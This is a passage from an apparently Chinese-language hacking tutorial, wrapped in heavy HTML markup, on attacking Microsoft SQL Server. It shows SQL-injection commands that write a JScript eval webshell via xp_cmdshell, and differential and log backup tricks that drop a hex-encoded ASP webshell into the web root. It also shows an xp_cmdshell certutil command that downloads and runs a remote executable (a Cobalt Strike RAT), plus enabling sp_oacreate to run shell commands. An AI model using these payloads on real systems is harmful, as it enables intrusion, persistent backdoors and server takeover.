    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\404.aspx' ;</span></code></span></span></p></li>
   </ol>

由于cmd写webshell的主意这些转义的问题 当然条件允许也可以使用certutil或者vbs什么的来下载

0x03 差异备份

能通过xp_cmdshell拿下webshell的情况现在也不算多了,备份拿shell还算常见 具体步骤搞过的朋友都知道。

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> backup database </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> to disk </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\bak.bak'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> create table </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">].[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">test</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">([</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">cmd</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">image</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]);</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> insert </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">into</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> test</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">cmd</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> values</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x3C25657865637574652872657175657374282261222929253E</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">4.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> backup database </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> to disk</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'C:\d.asp'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> WITH DIFFERENTIAL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">FORMAT</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;--</span></code></span></span></p></li>
   </ol>

差异备份我们有多种情况可能不成功,一般就是目录权限的问题,第一次备份的目录是否可能没有权限,第二次备份到网站目录是否有权限,所以一般不要直接备份到c盘根目录

当过滤了特殊的字符比如单引号,或者 路径符号 都可以使用前面提到的 定义局部变量来执行。

0x04 LOG备份

LOG备份的要求是他的数据库备份过,而且选择恢复模式得是完整模式,至少在2008上是这样的,但是使用log备份文件会小的多,当然如果你的权限够高可以设置他的恢复模式

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">alter database </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> RECOVERY FULL</span></code></span></span></p></li>
   </ol>
   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> alter database </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> RECOVERY FULL </span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> create table cmd </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">a image</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> backup log </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> to disk </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\xxx'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">with</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> init </span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">4.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> insert </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">into</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> cmd </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">a</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> values </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x3C25657865637574652872657175657374282261222929253E</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">5.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> backup log </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> to disk </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\xxx\2.asp'</span></code></span></span></p></li>
   </ol>

相对于差异备份,log备份的好处就是备份出来的webshell的文件大小非常的小我数据库没啥东西,前面备份出来2000k这个只有83k。

第八章 MSSQL提权与站库分离

0x00 xp_cmdshell

上一章备份中已经提到这个函数,在我们遇到站库分离的时候,没办法写webshell,后台也没办法拿下shell的情况下不妨试试用xp_cmdshell下载我们的RAT直接拿下数据库 下载文件我们有几个常用的思路如下

1.certutil

2.vbs

3.bitsadmin

4.powershell

5.ftp

这里我就用Cobalt Strike 不会的朋友可以看看我前面写的CS教程,他来搞这几个过程比较方便,我这里就以certutil为例,其他的用法在网上都很多的。

上传到一个可读可写的目录

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_cmdshell </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'cd c:\www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_cmdshell </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'cd c:\www & file.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>

顺道还用cs自带的ms14-058提权了一下

0x01 sp_oacreate

当xpcmdshell 被删除可以使用这个来提权试试,恢复spoacreate

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_configure </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'show advanced options'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">RECONFIGURE WITH OVERRIDE</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_configure </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Ole Automation Procedures'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">RECONFIGURE WITH OVERRIDE</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_configure </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'show advanced options'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>

spoacreate是一个非常危险的存储过程可以删除、复制、移动文件 还能配合spoamethod 来写文件执行cmd

在以前的系统有这几种用法

  1. 调用cmd 来执行命令

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">wscript</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">shell</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">执行命令</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'wscript.shell'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> output </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'run'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\system32\cmd.exe /c xxx'</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Shell</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Application</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">执行命令</span></code></span></span></p></li>
